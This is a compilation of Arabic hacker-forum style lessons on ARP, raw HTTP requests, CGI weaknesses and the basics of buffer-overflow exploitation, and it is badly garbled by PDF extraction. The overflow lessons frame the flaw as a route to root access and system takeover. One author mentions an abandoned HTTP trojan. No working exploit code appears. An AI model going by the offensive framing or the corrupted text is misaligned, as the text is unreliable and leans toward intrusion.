211‬‬ ‫الصورة ادناه توضح ال ‪ ARP cache‬‬ ‫الذاكرة تحتوي علي ‪ 3‬انواع من البیانات‪ :‬‬ ‫العمود الول یوجد فیه ال ‪ IP address ,‬العمود الثاني ال ‪ Hardware address‬او ال‬ ‫‪MAC ,‬العمود الثالث نجد فیه الوصف لحالة المدخل في ال‪ ARP cache .‬‬ ‫اذا كان المدخل في ال ‪ ARP cache‬حالته ‪ dynamic‬أي متغیر ذلك في حالة ان العنوان‪ ‬‬ ‫اكتشف خلل عملیة ال ‪ broadcast ,‬واذا كان ‪ static‬او ثابت اذا تم اضافة العنوان‪ ‬‬


‫‪manually‬او یدویا ‪ .‬‬ ‫ااستخدام النشر للبحث عن ال ‪ hardware address‬او عنوان العتاد‪ :‬‬ ‫اذا لم یجد ال ‪ ARP‬ال ‪ IP address‬في ذاكرة ال ‪ ARP ,‬فان بروتوكول ‪ ARP‬یبدا بما‪ ‬‬ ‫یسمي ‪ ARP request .‬او طلب ‪ ARP .‬هذا الطلب ینشر في الشبكة المحلیة‪ .‬‬ ‫نشر ال ‪ ARP‬یعنون الي أي جهاز في الشبكة بوضع عنوان ال ‪ hardware‬المستهدف علي‪ ‬‬ ‫القیمة ‪ FF:FF:FF:FF:FF:FF .‬نشر ال ‪ARP‬یحتوي علي عنوان ‪ IP‬الجهة المطلوبة حتي‬ ‫یستطیع المستقبل التعرف علیها ‪ .‬ایضا یحتوي علي عنوان ‪ hardware‬المصدر ‪ .‬‬ ‫بعد ان یصل الي الجهة او الجهاز وتعرف ان النشر هي المقصودة به ‪ ,‬تقوم بوضع ‪ IP‬وعنوان ال‪ ‬‬ ‫‪hardware‬المصدر او المرسل في ذاكرة ال ‪ ARP‬الخاصة بها ‪ .‬‬ ‫في حال ان ال ‪ ARP packet‬وصلت الي أي جهاز ‪ ,‬فان كارت الشبكة یقوم باخراج الحزمة‪ ‬‬ ‫‪ packet‬من خط الشبكة ویمررها خلل طبقة واجهة الشبكة الي طبقة النترنت وال ‪ ARP .‬ال‪ ‬‬ ‫‪ ARP‬في الوجهة المستقبلة یعمل اختبار للحزم لیري هل الحزمة لعنوان ‪ hardware‬الجهاز‪ ‬‬ ‫المرسل ‪ .‬‬ ‫اذا كان طلب ال ‪ ARP‬لیس لذلك الجهاز فان الحزمة ترفض ‪ .‬اذا وجد فیها عنوان ال‪ ‬‬ ‫‪ 311‬‬ ‫‪hardware‬تبع الجهاز المرسل ‪ ,‬ال ‪ IP‬وعنوان ال ‪ hardware‬لمصدر الحزمة توضع في‬ ‫‪ARP cache ,‬ویتم عمل ‪ ARP reply‬لمصدر الحزمة ‪ .‬‬ ‫عنوان ‪ hardware‬الهدف سیكون موجودا الن في ‪ ARP reply .‬‬ ‫عندما تصل اجابة ‪ ARP‬او ‪ ARP reply ,‬ال ‪ IP address‬وال ‪ Hardware‬‬ ‫‪address‬یبقوا في ‪ ARP cache‬لدقیقتین‪ .‬‬ ‫‪::‬مصطلحــــــــــــــــــات هـامــــــــــــــــــــــة ‪ ::‬‬ ‫‪ IP Address‬‬ ‫عنوان یستخدمه ‪ Internet Protocol :: IP ::‬لتعریف شبكة او جهاز‪ .‬‬ ‫‪ Logical Address‬‬ ‫هذا العنوان یمكن ان یعدل ‪ ,‬ویسمي به الجهاز‪ .‬‬ ‫‪ Subnet mask‬‬ ‫متغیر یتضمن أي عنوان ‪ IP‬موجود في الشبكة‪ .‬‬ ‫‪ Router‬‬ ‫جهاز یربط ببن الشبكات ویقوم بتحریك حزم البیانات من شبكة الي اخري‪ .‬‬ ‫‪ Remote Network‬‬ ‫شبكة غیر الموجود فیها الجهاز ‪ ,‬وهي تقع في الجانب الخر من ال ‪ Router .‬‬ ‫‪ Default Gateway‬‬ ‫متغیر یكون في عنوان ‪ IP‬الراوتر ‪ ,‬ویستخدم لتمریر ال ‪ packet‬الي شبكة اخري‪ .‬‬ ‫‪ Routing Table‬‬ ‫الجدول الذي یحتوي علي العناوین التي تشیر الي افضل طریق الي الشبكات الخري‪ .‬‬ ‫‪ ::Address Resolution Protocol ::ARP‬‬ ‫بروتوكول یستخدم لترجمة عنوان ‪ IP address‬الي عنوان العتاد ‪hardware address‬‬ ‫‪ .‬‬ ‫‪ 411‬‬ ‫‪ ARP cache‬‬ ‫منطقة في الذاكرة تحتوي علي عناوین ال ‪IP‬التي ترجمت حدیثا لعناوین ال‪ hardware .‬‬ ‫‪ ARP request‬‬ ‫الحزم المنتشرة التي تقوم بالبحث عن ترجمة ل عنوان ال ‪ IP‬لعنوان ال ‪ hardware .‬‬ ‫‪ ARP reply‬‬ ‫الحزم التي ترجع الي الي راسل ال ‪ ARP request‬وتكون محتویة علي ال ‪ IP address‬و‬ ‫ال ‪ hardware address‬اللي طلبهم ال‪ ARP .‬‬ ‫‪ 511‬‬ ‫بروتوكول ال‪ HTTP ‬تحت المجھر‪ ‬‬ ‫‪ GET http://www.arabicteam.com/index.html HTTP/1.0‬‬ ‫‪ */* :Accept‬‬


‫‪ Accept­Language: ar­sa‬‬ ‫‪ Accept­Encoding: gzip, deflate‬‬ ‫‪ (User­Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt‬‬ ‫‪ Host: www.arabicteam.com‬‬ ‫‪ Proxy­Connection: Keep­Alive‬‬ ‫;*************=‪ Cookie: Username=Kondor; Password‬‬ ‫;‪ language=arabic; Stylesheet=theblues; bblastvisit=985145236‬‬ ‫‪ bblastactivity=985145966‬‬ ‫______________________________‪___________________________ ‬‬ ‫حالتین‪ : ‬‬ ‫ن‬ ‫و في ھذه الحالة علینا التفريق بین‬ ‫ل‪ ‬‬ ‫أو ً ‪-‬استخدام بروكسي (كما في المثال السابق حیث يتم التصال مع ل‬ ‫ال‪ ( arabicteam ‬‬ ‫البروكسي و يتم أرسال البیانات السابقة له لجلب صفحة ل‬ ‫ی ‪-‬التصال مباشر دون بروكسي عندھ ا يتم التصال مع السیرفر المستضیف ا‬ ‫ثان ً‬ ‫ال‪ : index.html ‬‬ ‫للموقع و إرسال البیانات التالیة له لجلب صفحة ل‬ ‫‪ GET /index.html HTTP/1.0‬‬ ‫‪ */* :Accept‬‬ ‫‪ Accept­Language: ar­sa‬‬ ‫‪ Accept­Encoding: gzip, deflate‬‬ ‫‪ (User­Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt‬‬ ‫‪ Host: www.arabicteam.com‬‬ ‫;*************=‪ Cookie: Username=Kondor; Password‬‬ ‫;‪ language=arabic; Stylesheet=theblues; bblastvisit=985145236‬‬ ‫‪ bblastactivity=985145966‬‬ ‫‪ Connection: close‬‬ ‫ترويسة‪ ‬‬ ‫ة‬ ‫ل‪ GET ‬وھ ي عادة تستخدم لجلب معلومات من الصفحة أي‬ ‫ل‬ ‫أو ً ال‬ ‫ال‪ POST ‬و ھذه الترويسة ھامة‬ ‫ة‬ ‫التصفح العادي لكن ھناك ترويسات أخرى مثل ل‬ ‫‪ 116‬‬ ‫اا‪ ‬جد ً و ھ ي تستخدم لرسال بیانات إلى السیرفر (البیانات الطويلة) لن ال ‪ get‬‬ ‫‪ post‬‬ ‫‪p‬‬ ‫عاجز عن أرسال بیانات ضخمة تزيد عن ‪ 00056‬بايت على ما أعتقد و ال‬ ‫تستخدم بكثرة بال ‪ cgi‬و ال ‪ php‬و غیرھا‪ ..‬‬ ‫و يوجد ترويسة ال ‪ HEAD‬و ھي غیر مشھورة و نادرة الستخدام لنھا تستخدم‬ ‫م‬ ‫عادة لجلب معلومات عن ملف دون تحمیله ‪ ..‬‬ ‫حالتین‪ ‬‬ ‫ن‬ ‫ی ‪ -‬عنوان الصفحة المطلوبة و ھنا نفرق بین‬ ‫ثان ً‬ ‫اا‪ ‬‬ ‫الولى التصال مع البروكسي عندھ ا نعطیه العنوان كامل أي مثل ‪ ::‬‬ ‫‪ http://www.arabicteam.com/index.html‬‬ ‫مثل‪ ‬‬ ‫و الخرى التصال بالموقع مباشرة عندھ ا نطلب منه عنوان الملف فقط أي ل‬ ‫‪ :‬‬ ‫‪ /index.html‬‬ ‫ل‪ ‬‬ ‫ل‬ ‫أو ‪ dir1/dir2/index.html /‬مث ً‪ ‬‬ ‫ث ‪ -‬يجب أن يتبع العنوان بالترويسة ‪ HTTP/0.1‬أو ‪ HTTP/1.1‬و ھي دتل على ا‬ ‫ثال ً‬ ‫الصدار لل ‪ http‬و ھ ناك فرق بین الصدارين مثل أقفال التصال بعد انتھاءء‪ ‬‬ ‫الرسال ‪ ..‬‬ ‫رابعً ‪ -‬الترويسات الختیارية عدى ال ‪ :host‬وھي تحدد نوع ال ‪ mime‬و نظام ا‪ ‬‬ ‫إضافیة‪ ‬‬ ‫ة‬ ‫التشغیل و اللغة و ما إلى ذلك من معلومات إضافیة و لرؤية معلومات‬ ‫‪ . MIME‬‬ ‫‪.‬‬ ‫عن أنواع ال‬ ‫‪ ­http://www.isi.edu/in­notes/iana/assignments/media­types/media‬‬ ‫‪ . types‬‬ ‫لكن ما يھمنا ھنا ھو الترويسة الضرورية و ھي ال ‪ :HOST :‬و يأتي بعدھا‪ ‬‬


‫عنوان السیرفر أي مثل ‪ :‬‬ ‫‪ HOST: www.arabicteam.com‬‬ ‫المر الذي استفدنا منه ھ و كیف نتصفح النترنت عبر التلنت أو أي برنامج اتصال‬ ‫عادي و أصبح لدينا المعلومات الكافیة لصنع برنامج يستخدم ھذا البروتوكول ‪ ...‬‬ ‫‪ 711‬‬ ‫ملحظة‪ :‬يمكن الستفادة من برامج ال ‪ Sniffers‬لتحلیل البیانات الخارجة و‪ ‬‬ ‫ض للتعلم أكثر عن‪ ‬‬ ‫الداخلة للجھاز و تحلیل كل الباكیتس و التعلم منھا و أي ً‬ ‫ا‪ ‬‬ ‫البروتوكولت ‪ .‬‬ ‫و عند أرسالك لھذه المعلومات للسیرفر فسیرسل لك السیرفر الملف المطلوب‬ ‫ا‪ ‬‬ ‫ض ضمن ترويسات و ضمن نظام محدد سنشرحھا فیما بعد ‪.‬‬ ‫أي ً‬ ‫و الدرس الذي يلیه سنتكلم بأعماق التصالت و كیف يتم يتم ال ‪. Traceroute‬‬ ‫برنامج ال ‪ http‬تروجان (الذي ھ و تروجان يستخدم البروتوكول ال ‪) http‬انتھى‪ ‬‬ ‫العمل من ‪ %99‬منه لكني في النھاية توقفت عن العمل به لني وجدته دون‪ ‬‬ ‫جدوى ‪ .‬‬ ‫‪ 811‬‬ ‫ماھو ‪ CGI‬‬ ‫للكاتب‪ KING_ABDO:‬‬ ‫(‪ )1‬مقدمة للـ ‪ CGI‬‬ ‫‪ CGI=COMMON GATEWAY INTERFA CE‬ھي الواجھة التي تسمح بالتصال‪ ‬‬ ‫بین جانب المستخدم عن طريق المتصفح أو البرامج‪ ‬‬ ‫و خلفه و جانب الويب سیرفر الذي يفھم بروتوكول (‪ (HTTP‬‬ ‫الـ ‪ TCP/IP‬ھو البروتوكول الذي يستخدمه سكريبت السي جي أي و السیرفر‪ ‬‬ ‫أثناء التصال ‪ .‬البورت المحددة‪ ‬‬ ‫لھذا البروتوكول ھي ‪ ( 08‬من الممكن أن تتغیر ھذه البورت)‪ ‬‬ ‫تستطیع سكريبتات السي جي أي أن تقوم بتولید صفحات الويب و الصور و أيضا‬ ‫نتائج محددة طبقا لمدخلت معینه يقوم‪ ‬‬ ‫مبرمج السي جي أي بتحديدھا‪ ‬‬ ‫يقوم عمل سكريبتات السي جي أي علي خطوتین أساسیتین ‪ :‬‬ ‫‪ -1‬في الخطوة الولى يقوم السكريبت بعمل معالجة أولیه للبیانات التي أدخلت‬ ‫له‪ ‬‬ ‫‪ -2‬في الخطوة الثانیة يعمل السكريبت كقناه للبیانات التي يقوم المتصفح‪ ‬‬ ‫بارسالھا الي السیرفر أو العكس‪ ‬‬ ‫يقوم سكريبت السي جي أي بتشفیر البیانات حتي تتمكن من العمل في أي‪ ‬‬ ‫مناخ للعمل‪ ‬‬ ‫يمكن كتابة سكريبت السي جي أي بأي لغة برمجة سواء كانت لغة مجمعة‪ ‬‬ ‫مثل الفیجوال بیسك‪ ‬‬ ‫أو لغة مترجمة مثل البیرل و الفرق الوحید بین نوعین اللغات أن البرنامج‪ ‬‬ ‫المبرمج باللغة المجمعة سوف يكون أسرع في التنفیذ و لكن اللغات المترجمة‪ ‬‬ ‫‪ 911‬‬ ‫أسرع في عملیة التطوير‪ ‬‬ ‫للسكريبت اذا أردت أن تعمل علي تعديل السكريبت أو تطويره‪ ‬‬ ‫أھ م الوامر التي تعتبر وثیقة الصله لموضوعنا ھي كالتالي ‪ :‬‬ ‫‪ GET -1‬ھذا المر يقوم بطلب بیانات من السیرفر للمتصفح‪ ‬‬ ‫‪ POST -2‬ھذا المر يطلب من السیرفر قبول المعلومات المدخلة الیه من‪ ‬‬ ‫المتصفح‪ ‬‬ ‫‪ PUT -3‬ھذا المر يطلب من السیرفر قبول المعلومات المرسله الیه كبديل عن‪ ‬‬ ‫المدخلت الموجودة حالیا‪ ‬‬ ‫(‪ )2‬نقاط الضعف‪ ‬‬ ‫نقاط الضعف التي يسببھا سكريبت السي جي أي لیس ضعفا في السي جي‬


‫أي نفسه و لكنه‪ ‬‬ ‫ضعف في بروتوكول الـ‪ HTTP‬أو في أنظمة التشغیل المختلفة‪ ‬‬ ‫السي جي أي يسمح باستغلل نقاط الضعف الموجودة و لكن ھناك طرق‪ ‬‬ ‫أخري للوصول الي تحطیم النظام‪ ‬‬ ‫المني ‪ .‬كمثال يمكن الوصول الي الملفات الغیر محمیة باستخدام الـ ‪ FTP‬أو‪ ‬‬ ‫‪ TELNET‬‬ ‫‪ 021‬‬ ‫ماھو ‪ Buffer Overflows‬‬ ‫للكاتب‪ LAMeR:‬‬ ‫اقدم لكم درس يشرح ما معنى الـ ‪ .. Buffer Overflows‬وانشاالله تستفیدون‪ ‬‬ ‫منه‪ ‬‬ ‫يله نبدأ‪ ‬‬ ‫محتويات الدرس‪ :‬‬ ‫‪ - 1‬ما ھو الـ ‪ Buffer Overflow‬؟‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­<‪ ‬‬ ‫‪ - 2‬المعالجه(‪ (Proccess‬‬ ‫­­­­­­­­­­­­­­­­­<‪ ‬‬ ‫‪ - 3‬إدارة الذاكره (‪ (management Memory‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­<‪ ‬‬ ‫‪ - 4‬استغلل ماذكر في الـ ‪ Buffer Overflow‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­<‪ ‬‬ ‫* ماذا يجب أن أعرف قبل أن أقرأ ھذه المقالة؟‪ ‬‬ ‫لیس الكثیر‪ ،،،‬فھ ذا دلیل اساسي لك اذن فقط تحتاج ان تكون لديك معرفة‪ ‬‬ ‫أساسیة بمفھ وم برامج الحاسوب وإدارة الذاكرة‪ ‬‬ ‫‪- 1‬ما ھو الـ ‪Buffer Overflow‬؟‪ ‬‬ ‫>­­­­­­­­­­­­­­­­­­­­­­­<‪ ‬‬ ‫‪ Overflow Buffer‬حالة تحدث لبرنامج بسبب برمجة سیئة أو بمعنى اخر برمجة‬ ‫تحمل أخطاء‪ .‬‬ ‫احدث ثغرة يمكنك أستغللھا من نوع ‪ Buffer Overflow‬تسمى فايروس '‪ code‬‬ ‫‪ 121‬‬ ‫‪ ، 'red‬التي أستغلت في خادم ‪ IIS‬لمايكروسوفت ‪ ­ MS web server-‬‬ ‫عموما‪ ،‬يحدث ‪ Buffer Overflow‬عندما يظھ ر برنامج ما متّغر بحجم ثابت (على‬ ‫ی‪ ‬‬ ‫سبیل المثال‪،‬حجم ‪ 02‬بايت) و القیمة التي خ ّصت إلى ھذه المتّغر أكبر من‪ ‬‬ ‫ص‪ ‬‬ ‫ی‬ ‫حجم المتّغر‪ .‬‬ ‫ی‪ ‬‬ ‫خذ ھذا المثال‪ :‬‬ ‫يظھر برنامجي على الشاشة ھ ذه الجملة‪" :‬رجاء إطبع اسمك الول‪" :‬ثم‪ ‬‬ ‫سیأخذ برنامجي من المستخدم البیانات التي سیدخلھا وھي (اسمه الول)‪ ‬‬ ‫ثم توضع في متغیر فتظھ ر في برنامجي او تخزن‪ .‬‬ ‫المشكلة ھ نا تكمن في انه إذا كان المتّغر مخصص لتخزين بیانات حجمھا‪ ‬‬ ‫ی‪ ‬‬ ‫القصى يساوي ‪ 51‬بايت والبیانات ھنا(وھي اسم المستخدم)حجمھا ‪ 52‬بايت‬ ‫التي ستخزن في المتغیر (يتضح لنا ان اسم المستخدم وضع في مكان اقل‪ ‬‬ ‫من حجمه )‪ .‬‬ ‫اذن ماذا سیحدث للبیانات الزائدة عن ‪ 51‬بايت من المؤكد انھا سـ"تطفح‪ ‬‬ ‫‪ "Overflow‬على الذاكرة التي خ ّصت لمتّغر السم‪ .‬‬ ‫ص‪ ‬‬ ‫ی‬ ‫عندما يبدأ البرنامج‪ ،‬تخ ّص الذاكرة ‪ :‬‬


‫ص‪ ‬‬ ‫‪ >1<memory Other things in><vname><var2><var‬‬ ‫‪ 01b 6b 15b‬‬ ‫(‪ var 1‬و ‪ var 2‬متّغرات لیست لھا علقة بالسم المدخل ‪ vname,‬المتّغر الذي‬ ‫ی‪ ‬‬ ‫ی‬ ‫حجمه ‪ 51‬بايت‪ ‬‬ ‫وھو الذي سیحتوي السم الذي سیدخله المستخدم)‪ ‬‬ ‫نفترض ان المستخدم سیدخل السم " ‪ abcabcabcabcabcabcabcabca‬‬ ‫‪ "bc‬حینھا ستبدو الذاكره ھكذا‪ :‬‬ ‫‪ somevalue2avalusabcabcabc‬‬ ‫‪ abcabcabcabcabcabc‬‬ ‫‪ >1<other things go here>< vname><var2>< var‬‬ ‫اذا ماذا حدث ؟؟ المتّغر ‪" vname‬طفح ‪ "overflowed‬بسبب البیانات المدخلة‪ ‬‬ ‫ی‪ ‬‬ ‫علیه من قبل المستخدم و قیمة "‪ other things in memory‬أشیاء اخرى في‪ ‬‬ ‫الذاكره" تّغرت بسبب فیض(‪ (overflow‬الحروف من ادخال المستخدم‪ .‬‬ ‫ی‪ ‬‬ ‫‪ 221‬‬ ‫اذن كیف أستغ ّ ھذا الخطأ؟؟؟‪ ‬‬ ‫ل‪ ‬‬ ‫قبل أن نصل إلى الجواب‪ ،‬ھناك بعض الشیاء الساسیة المھمة التي يجب‪ ‬‬ ‫علینا أن نعرفھا حول تركیب وبنیة الحاسوب ‪ .‬‬ ‫في ھذه المقالة سنناقش نظام لینكس ‪ ،linux‬لكن المفھوم مماثل لباقي‪ ‬‬ ‫النظمة‪ .‬‬ ‫‪-2‬المعالجه(‪ :(Proccess‬‬ ‫>­­­­­­­­­­­­­­­­<‪ ‬‬ ‫ن‪ ‬‬ ‫إ ّ الوحدة الوظیفیة الساسیة في حاسوب يعمل ھي عملیة المعالجه‬ ‫(‪.(Proccess‬في الحاسوب ھنالك العديد من العملیات ونظام التشغیل مسؤول‬ ‫عن تقسیم الق ّة التي تجعل العديد من العملیات تعمل في نفس الوقت في‪ ‬‬ ‫و‪ ‬‬ ‫الحاسوب‪ .‬‬ ‫لیس ھناك شيء إسمه "متعددالعملیات ‪ "Multi­ proccesses‬صحیح‪ ...‬كیف‪ ‬‬ ‫اذن؟؛ ا ّ وحدة المعالجة المركزية(‪ (CPU‬تنتقل بین العملیات ك ُ على حده‪ ‬‬ ‫ن‪ ‬‬ ‫ل‬ ‫بسرعة كبیره بحیث تبدو مثل العديد من المھام التي تعمل في وقت واحد‪ ،‬‬ ‫اذا تبدو لنا كأن العملیات تعمل في وقت واحد وھذه من خدع الحاسوب التي‪ ‬‬ ‫يؤديھا علینا ‪ .. ):‬‬ ‫ل‬ ‫ك ّ عملیة لھ ا عنوان فاضي من الذاكره ‪ ،‬وليمكن لي عملیةآخرى تدخل في‬ ‫ھذا المكان الفاضي من الذاكرة‪ .‬وھذا يرشدنا الى شي اخر يجب ان تفھمه‪ ‬‬ ‫وھو‪ :‬‬ ‫‪ -3‬إدارة الذاكره (‪ :(management Memory‬‬ ‫>­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­<‪ ‬‬ ‫تدير أنظمة التشغیل‪ ­operating systems-‬الحديثة ذاكرة افتراضیة ‪ virtual‬‬ ‫‪)memory‬تخیلیة)‪ .‬‬ ‫ذلك يعني بّأه ليمكن لي تطبیق (برنامج مثل) الوصول مباشرة إلى الذاكرة‪ ‬‬ ‫ن‪ ‬‬ ‫الحقیقیة‪.‬لماذا؟؟‪ ‬‬ ‫انظمة التشغیل ‪ Operating System‬تمتلك جدول تخطیط "تحويل العناوين‪ ‬‬ ‫الحقیقیة من الذاكرة الى عناوين افتراضیة(تخیلیة)" ‪ .‬‬ ‫‪ 321‬‬


‫وعندما تقوم ذاكرة الـ ‪ ) OS‬نظام التشغیل)بتحديد مكان في الذاكرة لبرنامج‪ ‬‬ ‫معین لتشغیله ‪،‬يأخذ البرنامج العنوان التخیل ّ فقط ‪ ،‬ولیس العنوان الطبیعي‪ .‬‬ ‫ي‪ ‬‬ ‫و ھ نالك استخدام اخر للذاكرة الفتراضیة(التخیّلة) وھي انه من المعلوم أن‪ ‬‬ ‫ی‪ ‬‬ ‫الذاكرة الحقیقیة ل ترتبط مباشرة بكل عملیة (أو برنامج)‪ ،‬فنظام التشغیل‪ ‬‬ ‫يستخدم مساحة على القرص الصلب كذاكرة‪ ،‬‬ ‫والتطبیق ل يمكنه أبدا معرفة مكان الذاكرة ( مكان الذاكرة الحقیقة )‪،‬ذلك لن‪ ‬‬ ‫المساحة المخصصة للذاكرة في القرص الصلب تتبدل وتتغیر‪ .‬‬ ‫توضیح ‪ .:‬ان الذاكرة ل تنقسم الى ذاكرة حقیقة وذاكرة افتراضیة بل أنھما‪ ‬‬ ‫ينتمیان لذاكرة واحد‪ ‬‬ ‫اذن ما فائدة التسمیة الى حقیقیة وافتراضیة ؟؟ الجواب ھو للمتییز فقط ‪ ،‬حیث‬ ‫ان الذاكرة الحقیقة تمثل مساحة معینة من القرص الصلب (ومكان ھذه‪ ‬‬ ‫المساحة في تغیر مستمر) لذلك سمیت حقیقیة او بمعنى اخر طبیعیة (اي‪ ‬‬ ‫بأستطاعتك لمس مكان الذاكرة الطبیعیة بیدك على القرص الصلب)‪ ‬‬ ‫وفائدة الذاكرة الفتراضیة ھي إعطاء عنوان افتراضي (غیر حقیقي ) للذاكرة‪ ‬‬ ‫الحقیقیة اي يعطي عنوان كأسم فقط لمكان مساحة الذاكرة الطبیعیة في‪ ‬‬ ‫القرص الصلب ‪ ،‬وإن تغیر مكان المساحة المخصصة للذاكرة يظل العنوان‪ ‬‬ ‫الفتراضي(التخیلي) ثابت‪ .‬‬ ‫‪ - 4‬استغلل ماذكر في الـ ‪ Overflow Buffer‬‬ ‫>­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­<‪ ‬‬ ‫الن نصل إلى الجزء الھم والمرح‪ ‬‬ ‫كیف نستفید من الذي قلنا عن المعالجة وإدارة الذاكرة للوصول والدخول الى‪ ‬‬ ‫الجذر (‪ (Root‬وأختراق النظام؟ تذ ّر نحن قلنا في وقت سابق بّأه عندما يكون‬ ‫ك‪ ‬‬ ‫ن‬ ‫الدخال(البیانات) من المستخدم أكبر حجما من الذاكرة التي خ ّصت لھذه‪ ‬‬ ‫ص‪ ‬‬ ‫البیانات‪ ،‬البیانات الزائدة ستفیض (‪ (overflow‬في الذاكرة التي بعد السم‪ ‬‬ ‫المتّغر؟ ھذا المكان من الذاكرة ھ و المكان الذي نستفید منه في الختراق‪ .‬ی‪ ‬‬ ‫ماذا نعمل في ذلك المكان‪ :‬داخل خط (مكان) البیانات التي يدخلھا المستخدم‬ ‫(في المثال السابق وھ و السم الول الذي يطلب من قبل البرنامج ثم أدخلناه‪ ‬‬ ‫) نضع الوامر الكثر شعبیة للحاسوب‪ ،‬حیث ھذه الوامر تجعل الحاسوب‪ ‬‬ ‫يحدث(ينتج) ھ یكل نستطیع استخدامه فیما بعد للقیام بالسیطرة الكاملة‪ ‬‬ ‫للنظام المستغ ّ‪ .‬القیام بھ ذا العمل لیس بیسطا كما يبدو لك‪ ،‬إذن لو أردت‪ ‬‬ ‫ل‪ ‬‬ ‫معرفة كیف يعمل ‪ ،‬أنت يجب أن تقرأ المقالة القادمة حول ‪ ،Buffer Overflows‬‬ ‫‪ 421‬‬ ‫الذي سیصف بالضبط كیف لستغلل واحده من الـ‪ Buffer Overflows‬في‪ ‬‬ ‫الختراق‪ .‬‬ ‫اخیرا اتمنى انكم فھ متوا الدرس زين وعرفتوا ايش معنى ‪ Overflow Buffer‬‬ ‫واللي فھ م الدرس نص نص يعید قرائته اكثر من مرة مع التدقیق وانشاالله يفھم‬ ‫واذا فیه سؤال يتعلق بالدرس انا حاظر ويالیت ما تستبقون المور وتسألون‪ ‬‬ ‫أسأله عن طريقة الستغلل لني بأحط درس مثل ما قلت لكم يشرح التفاصیل‬ ‫قريبا انشاالله‪ ‬‬ ‫‪ 521‬‬ ‫دراسة ‪ BOF‬‬ ‫للكاتب‪ Red Code :‬‬ ‫كتبت ھ ذا الموضوع قبل عده ايام في منتديات المدمر والن انقله ھنا بعد ان تم‬ ‫افتتاح المنتدي مجددا ( حمد الله علي السلمه )‪ ‬‬ ‫طبعا انا اعتبر ھ ذا الموضوع ممیز لنه ل يتطلب من القاري اي فھم عمیق‪ ‬‬


‫للمعالجات او للغه السمبلي او لغه السي‪ ‬‬ ‫اتمني للجمیع الفائده والستمتاع وانتظروا قريبا مفاجاه من العیار الثقیل‪ ‬‬ ‫بخصوص كتابه الستثمارات لمن ليملك اي خبره برمجه او خلفیه عن طبیعه‪ ‬‬ ‫الثغرات حتي ذلك الوقت اخلیكم تمخمخون مع درسنا الیوم‪ ‬‬ ‫بسم االله نبدا‪ ‬‬ ‫‪ buffer over flow exploit‬‬ ‫ھو الداه رقم واحد في ايدي ھاكرز ھذه اليام ‪ ....‬قوي وسھل الستخدام‪ ‬‬ ‫ومنتشر ويشكل الخطر الكبر والوحید‪ ‬‬ ‫علي مشاريع ھذه اليام‪ .‬‬ ‫ھناك اللف من الــ ‪unchecked buffers‬اللي تمكن الھكر من عمل ‪ overflow‬‬ ‫لھا‪ .‬‬ ‫ويمكنك التاكد من ذلك بمعرفه ان ‪ %07‬من نصائح ‪ CERT‬صدرت للتعامل مع‪ ‬‬ ‫ھذه المشكله ‪ .‬والمشكله‪ ‬‬ ‫الكبر ان الستثمارات لھذا النوع من الثغرات سھله الستخدام لدرجه ان‪ ‬‬ ‫الطفال ممكن ينفذونھا بدون اي مشاكل لنه‪ ‬‬ ‫ليحتاج الي اي خبره تقنیه لتنفیذ ھ ذه الكواد ‪ .‬وقوي جدا لنه في كثیر من‪ ‬‬ ‫الحالت ينفذ الكود كــ ‪ ROOT‬ومن ثم امكانیه‪ ‬‬ ‫تنفیذ اي شي يخطر علي بالك‪ .‬‬ ‫الــ ‪unchecked buffer‬يسمح بعمل ‪ buffer overflows‬كیف ؟‪ ‬‬ ‫يحدث الــ ‪unchecked buffer‬عندما يقوم مبرمج التطبیق باھمال حجم البیانات‬ ‫‪ .‬في معظم لغات البرمجه‪ ‬‬ ‫يعین حجم ثابت للــ ‪ buffer‬لیخزن البیانات ‪ .‬نظريا المبرمج يعین حجم مناسب‪ ‬‬ ‫وكافي كا ‪ buffer‬لتخزين البايانات‪ ‬‬ ‫دعونا نعطي مثال يوضح الفكره اكثر‪ .‬‬ ‫لنفرض انك يامن تقرا ھ ذه الكلمات مبرمج وتريد كتابه ‪ routine‬لدخول‪ ‬‬ ‫المستخدمین في تطبیق تعمل علیه ‪ ,‬طبعا‪ ‬‬ ‫سوف يستقبل اسم المستخدم وكلمه المرور من المستخدمین ومن ثم يحدد‬ ‫‪ 621‬‬ ‫ھل يسمح له بالدخول ام ل ‪ .‬من اول الشیاء التي يجب‪ ‬‬ ‫علیك تعیینھا كم المساحه التي سوف تخصصھا للــ ‪buffer‬المستخدم لسم‪ ‬‬ ‫الیوزر والباسورد ‪ .‬وفي النظام الذي تعمل علیه‪ ‬‬ ‫الطول القصي لسم المستخدم ‪ 23‬خانه ‪ .‬قررت تحديد ‪ 001‬خانه لذاكره‪ ‬‬ ‫الـ ‪buhffer‬والتي تعتبر اكثر من كافیه‪ ‬‬ ‫لحفظ اطول اسم مستخدم واعتقدت بشكل خاطي ان الــ ‪routine‬آمن لن‪ ‬‬ ‫حجم الــ ‪buffer‬اكبر بكثیر من‪ ‬‬ ‫‪23‬خانه التي يدخلھا المستخدمین افتراضیا لكن بما انك اھملت التدقیق‪ ‬‬ ‫المتعلق بفحص المدخلت قبل نسخھا الي الـ ‪ buffer‬‬ ‫فھذا يعني ان الــ ‪routine‬ھذا في التطبیق اللي تبرمجه يمكن استثماره فكل‪ ‬‬ ‫مايلزم المھاجم ھو ارسال اكثر من ‪ 001‬خانه‪ ‬‬ ‫وتمكن من عمل‪ buffer over flow .‬‬ ‫الن دعنا نتكلم عن الستثمار ففي ابسط الحالت عند عمل ‪buffer over flow‬‬ ‫للتطبیق يحطمه ‪ crash‬‬ ‫ويوقفه عن العمل وبذلك يكون قد نجح ھجوم حجب الخدمه علي تطبیقك ‪DOS‬‬ ‫‪.‬وفي معظم الحالت يقوم المھاجم ببناء‪ ‬‬ ‫المدخلت التي سوف يرسلھ ا للتطبیق بحیث يتمكن من تطبیق اوامر محدده‪ ‬‬ ‫علي نظامك ھ ذه الوامر ممكن ان تكون اي شي‪ ‬‬ ‫مثل عمل فورمات للھ ارد دسك او سرقه بیانات او تركیب باب خلفي او اي شي‬ ‫اخر ‪ .‬‬ ‫دعونا نوضح اكثر‪ :‬‬ ‫برامج الكمبیوتر تنظم علي شكل ‪ subroutines .‬للبرنامج ‪ 